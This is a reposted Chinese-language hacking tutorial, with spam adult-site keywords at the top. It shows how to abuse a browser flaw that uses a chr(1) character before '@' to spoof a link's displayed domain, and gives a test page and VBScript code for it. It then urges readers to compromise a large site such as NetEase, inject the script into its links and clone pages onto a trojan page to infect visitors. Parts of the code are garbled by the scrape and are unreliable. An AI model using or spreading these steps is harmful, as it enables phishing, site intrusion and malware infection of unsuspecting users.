国产一级a片免费看高清,亚洲熟女中文字幕在线视频,黄三级高清在线播放,免费黄色视频在线看

打開APP
userphoto
未登錄

開通VIP,暢享免費(fèi)電子書等14項(xiàng)超值服

開通VIP
利用瀏覽器漏洞實(shí)現(xiàn)域名欺騙的過程

當(dāng)用戶通過瀏覽器訪問一個(gè)url,如果這個(gè)url是經(jīng)過以下的格式構(gòu)造的,那么瀏覽器實(shí)際將訪問經(jīng)過構(gòu)造的惡意頁面,而用戶瀏覽器的地址欄里所顯示的將是虛假的url:
url的構(gòu)造格式為:
_1][special_char]@[url_2]/ target=_blank>http://[url_1][special_char]@[url_2]
說明:
url_1為用戶所看到的地址,地址中不可以帶/
special_char為一個(gè)特殊的字符,即ascii碼為1的字符
url_2為惡意頁面地址

利用過程

首先請看這個(gè)測試頁面:
<html>
<head>
<title>域名欺騙技術(shù)實(shí)例</title>
</head>
<body link=#0000ff alink=#0000ff vlink=#0000ff>
你可以看看這兩個(gè)鏈接有什么區(qū)別:<br>
<h1>鏈接1:<script language=vbscript src=deceive.vbs></script></h1>
<h1>鏈接2:<a href=_blank ?>www.163.com target=_blank>http://www.163.com/; target=_blank http://ww ... ;>www.163.com</a></h1>
</body>
</html>


這個(gè)網(wǎng)頁源代碼,其中鏈接1指向了一個(gè)vbs腳本,而鏈接2指向的是163站點(diǎn)。如果我們把連接一的vbs腳本改成下列代碼:
''''''''''''''''''''''''''''''''''''''deceive.vbs'''''''''''''''''''''''''''''''''''''''''''''
'(以下請根據(jù)實(shí)際情況自行修改:)
url1=http://www.163.com/
url2=http://www.google.com/
text=http://www.163.com/
url=_blank ?>http://;&url1&chr(1)& ... p;url2&
dn=/
mouseover=onmouseover=javascript :window.status='_blank ?>http://;&url1&dn&'
mouseout=onmouseout=javascript :window.status=''
click=onclick=javascript :navigate('&url&')
style=style=cursor:hand
tag=<span &style& &mouseover& &mouseout& &click&><font color=#0000ff><u>&text&</u></font></span>
document.write tag
'說明:
'url1是用來欺騙用戶的地址.
'url2是實(shí)際訪問的地址,可以是網(wǎng)頁木馬、惡意網(wǎng)頁等.
'text是鏈接的文字.
'注意:(以上欺騙地址及實(shí)際地址不可以加http://)
'''''''''''''''''''''''''''''''''''''''cuts here''''''''''''''''''''''''''''''''''''''''''''''''

現(xiàn)在大家看到了吧~~當(dāng)我們點(diǎn)擊這個(gè)測試頁面的時(shí)候,鏈接1指向的是google.com,而且狀態(tài)欄和地址欄里都顯示_blank>http://www.163.com/,鏈接2卻指向163.com。你也許感到不可思議,但這就是域名欺騙漏洞的魅力。

我們可以想象,如果以上的測試頁面中的鏈接1指向的不是google.com,而是我們的網(wǎng)頁木馬,那就......

不過,一個(gè)普通的個(gè)人網(wǎng)站沒人會(huì)看的,這就需要我們把這種假鏈接添加到別的大網(wǎng)站的頁面之中。假設(shè)我們?nèi)肭至艘粋€(gè)比較大的網(wǎng)站,比如網(wǎng)易。這時(shí)候就可以把它的頁面給改了。
比如有一個(gè)文字鏈接,我們就可以把代碼中的<a href=xxxxx.htm>xxxxxx</a>改為我們自己的代碼:<script language=vbscript src=deceive.vbs></script>??吹絪rc屬性里的deceive.vbs了嗎 ?我們要編輯好這個(gè)文件,然后上傳到要修改的頁面目錄下。

這樣還不行,我們還要把自己的木馬網(wǎng)頁的界面修改一下。也就是把原來鏈接到的頁面加入到我們自己的木馬網(wǎng)頁,并且我們的木馬網(wǎng)頁里的所有鏈接等內(nèi)容要和原來的頁面一樣,否則就會(huì)引起用戶的懷疑?,F(xiàn)在,我們把google網(wǎng)站的首頁源代碼全部復(fù)制下來,添加到我們的網(wǎng)頁木馬。把復(fù)制下來的代碼中的圖片或者是鏈接的文件都修改完整,比如logo.gif改為_blank>/UpLoadFiles/NewsPhoto/comalogo.gif,否則網(wǎng)頁就和原來的不一樣了(圖片顯示為紅色的×,鏈接也失效),因?yàn)橛脩舸蜷_的是你的站點(diǎn),而你的站點(diǎn)中并沒有l(wèi)ogo.gif。都修改好后就可以保存文件了。上傳到你的網(wǎng)頁空間里。

至此,我們的工作已經(jīng)完成。喝一杯咖啡,休息一會(huì)......

當(dāng)我們進(jìn)入這個(gè)網(wǎng)站后,點(diǎn)擊我們修改過的連接,你會(huì)發(fā)現(xiàn)和原來的頁面幾乎就一模一樣(當(dāng)然,也有些細(xì)微的區(qū)別,不過一般很難覺察)。就當(dāng)人家在瀏覽這個(gè)網(wǎng)頁的時(shí)候,他已經(jīng)在不知不覺中中了木馬。

本站僅提供存儲(chǔ)服務(wù),所有內(nèi)容均由用戶發(fā)布,如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請點(diǎn)擊舉報(bào)
打開APP,閱讀全文并永久保存 查看更多類似文章
猜你喜歡
類似文章
網(wǎng)頁掛馬方法和技巧大匯總
什么是網(wǎng)頁掛馬(1)_安全技巧_超級(jí)巡警暢游巡警官方網(wǎng)站
百度官方 網(wǎng)站結(jié)構(gòu)優(yōu)化主要怎么做包括哪些方面
HTML meta 詳解
Canonical標(biāo)簽的作用和注意事項(xiàng)是什么?
各類 HTTP 返回狀態(tài)代碼詳解
更多類似文章 >>
生活服務(wù)
分享 收藏 導(dǎo)長圖 關(guān)注 下載文章
綁定賬號(hào)成功
后續(xù)可登錄賬號(hào)暢享VIP特權(quán)!
如果VIP功能使用有故障,
可點(diǎn)擊這里聯(lián)系客服!

聯(lián)系客服